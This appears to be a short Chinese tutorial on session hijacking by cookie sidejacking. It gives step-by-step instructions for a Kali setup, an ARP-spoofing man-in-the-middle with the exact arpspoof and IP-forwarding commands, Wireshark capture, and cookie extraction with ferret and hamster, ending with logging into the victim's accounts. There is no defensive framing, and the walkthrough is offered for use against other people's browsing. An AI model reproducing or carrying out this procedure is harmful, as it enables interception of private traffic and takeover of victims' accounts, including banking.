指的是直接获取到你的cookie信息，不需要做任何的修改直接去访问服务器资源，例如：登录。这样类似于，我在自个电脑登录网银，传输过程中cookie信息被人截取，盗取后其在自己电脑上做登录我的账号信息

1.修改虚拟机的网络编辑器 2.进行网络桥接 3.查看Kali和无线局域网适配器的IP地址 4.查看Kali和无线局域网适配器的IP地址是否能ping通 5.在Kali输入 vim /etc/apt/sourslist修改yum源 6. 输入dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386进行安装 7.echo 1 > /proc/sys/net/ipv4/ip_forward 开启kali路由转发功能 arpspoof -i eth0 -t 网关 目标主机 进行中间人攻击 8.打开Wireshark进行抓包 9.受害者主机在进行网页浏览的时候，有很多网页自动有Cooikes密码保存 10. wireshark保存窃取的流量为.pacp文件 11. ferret -r 处理流量，生成cookies文件hamster.text 12. 启动hamster 13.打开浏览器选项中设置代理为127.0.0.1：1234 14.hamaster 找到目标IP ，登录目标用户的网站 15.登录目标用户的网站